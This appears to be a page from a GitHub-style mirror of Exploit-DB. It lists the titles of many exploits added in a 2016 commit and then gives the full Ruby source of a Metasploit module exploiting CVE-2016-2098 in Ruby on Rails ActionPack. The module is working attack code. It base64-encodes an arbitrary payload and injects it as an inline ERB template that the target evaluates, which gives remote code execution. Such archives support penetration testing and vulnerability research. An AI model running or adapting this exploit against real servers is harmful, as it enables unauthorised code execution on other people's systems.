bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/ruby/remote/40086.rb
Offensive Security fc4bc08825 DB: 2016-07-12 
15 new exploits

Apache HTTPd - Arbitrary Long HTTP Headers DoS
Apache HTTPd - Arbitrary Long HTTP Headers DoS (Perl)

Apache HTTPd - Arbitrary Long HTTP Headers DoS
Apache HTTPd - Arbitrary Long HTTP Headers DoS (C)

Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit (c code)
Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit (C) (1)

Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (2) (c code)
Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow (C) (2)
Webhints <= 1.03 - Remote Command Execution Exploit (perl code) (1)
Webhints <= 1.03 - Remote Command Execution Exploit (c code) (2)
Webhints <= 1.03 - Remote Command Execution Exploit (perl code) (3)
Webhints <= 1.03 - Remote Command Execution Exploit (Perl) (1)
Webhints <= 1.03 - Remote Command Execution Exploit (C) (2)
Webhints <= 1.03 - Remote Command Execution Exploit (Perl) (3)
phpBB <= 2.0.15 - Register Multiple Users Denial of Service (Perl Code)
phpBB <= 2.0.15 - Register Multiple Users Denial of Service (C Code)
phpBB <= 2.0.15 - Register Multiple Users Denial of Service (Perl)
phpBB <= 2.0.15 - Register Multiple Users Denial of Service (C)

SimpleBBS <= 1.1 - Remote Commands Execution Exploit (c code)
SimpleBBS <= 1.1 - Remote Commands Execution Exploit (C)

Xmame 0.102 (-lang) Local Buffer Overflow Exploit (c code)
Xmame 0.102 - (lang) Local Buffer Overflow Exploit (C)

aFAQ 1.0 (faqDsp.asp catcode) Remote SQL Injection Vulnerability
aFAQ 1.0 - (faqDsp.asp catcode) Remote SQL Injection Vulnerability

Apple CFNetwork HTTP Response Denial of Service Exploit (rb code)
Apple CFNetwork - HTTP Response Denial of Service Exploit (RB)

PhpBlock a8.4 (PATH_TO_CODE) Remote File Inclusion Vulnerability
PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion Vulnerability

WebPortal CMS <= 0.7.4 (code) Remote Code Execution Vulnerability
WebPortal CMS <= 0.7.4 - (code) Remote Code Execution Vulnerability

emergecolab 1.0 (sitecode) Local File Inclusion Vulnerability
emergecolab 1.0 - (sitecode) Local File Inclusion Vulnerability

Simple Machines Forums (BBCode) Cookie Stealing Vulnerability
Simple Machines Forums - (BBCode) Cookie Stealing Vulnerability

Movie PHP Script 2.0 (init.php anticode) Code Execution Vulnerability
Movie PHP Script 2.0 - (init.php anticode) Code Execution Vulnerability

Kjtechforce mailman b1 (code) SQL Injection Delete Row Vulnerability
Kjtechforce mailman b1 - (code) SQL Injection Delete Row Vulnerability

WordPress Activity Log Plugin 2.3.1 - Persistent XSS

IPS Community Suite 4.1.12.3 - PHP Code Injection
Adobe Flash - ATF Processing Overflow
Adobe Flash - JXR Processing Double Free
Adobe Flash - LMZA Property Decoding Heap Corruption
Adobe Flash - ATF Image Packing Overflow
Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (msf)

Ho' Detector (Promiscuous mode detector shellcode) (56 bytes)
Ho' Detector - Promiscuous mode detector shellcode (56 bytes)

MS16-016 mrxdav.sys WebDav Local Privilege Escalation

Ruby on Rails ActionPack Inline ERB Code Execution

Lan Messenger sending PM Buffer Overflow (UNICODE) - Overwrite SEH
Lan Messenger - sending PM Buffer Overflow (UNICODE) Overwrite SEH
Tiki Wiki CMS 15.0 - Arbitrary File Download
Belkin Router AC1200 Firmware 1.00.27 - Authentication Bypass
WordPress All in One SEO Pack Plugin 2.3.6.1 - Persistent XSS
Device42 WAN Emulator 2.3 Traceroute Command Injection
Device42 WAN Emulator 2.3 Ping Command Injection
Device42 WAN Emulator 2.3 - Traceroute Command Injection
Device42 WAN Emulator 2.3 - Ping Command Injection

Samsung Galaxy S6 Samsung Gallery - Bitmap Decoding Crash

Dell KACE K1000 File Upload
Dell KACE K1000 - File Upload

Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection
Dell SonicWALL Scrutinizer 11.01 - methodDetail SQL Injection

Valve Steam 3.42.16.13 - Local Privilege Escalation
Beauty Parlour & SPA Saloon Management System - Blind SQL Injection
Clinic Management System - Blind SQL Injection

Linux x86-64 Continuously-Probing Reverse Shell via Socket + Port-range + Password - 172 Bytes
2016-07-12 05:05:04 +00:00

70 lines
No EOL
2.2 KiB
Ruby
Executable file
Raw Blame History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails ActionPack Inline ERB Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in the
inline request processor of the Ruby on Rails ActionPack component.
This vulnerability allows an attacker to process ERB to the inline
JSON processor, which is then rendered, permitting full RCE within
the runtime, without logging an error condition.
},
'Author' =>
[
'RageLtMan <rageltman[at]sempervictus>'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2016-2098' ]
],
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Privileged' => false,
'Targets' => [ ['Automatic', {} ] ],
'DisclosureDate' => 'Mar 1 2016',
'DefaultOptions' => {
"PrependFork" => true
},
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
OptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id'])
], self.class)
end
def json_request
code = Rex::Text.encode_base64(payload.encoded)
return {
datastore['TARGETPARAM'] => {"inline" => "<%= eval(%[#{code}].unpack(%[m0])[0]) %>"}
}.to_json
end
def exploit
print_status("Sending inline code to parameter: #{datastore['TARGETPARAM']}")
send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'ctype' => 'application/json',
'headers' => {
'Accept' => 'application/json'
},
'data' => json_request
}, 25)
end
end
Reference in a new issue View git blame Copy permalink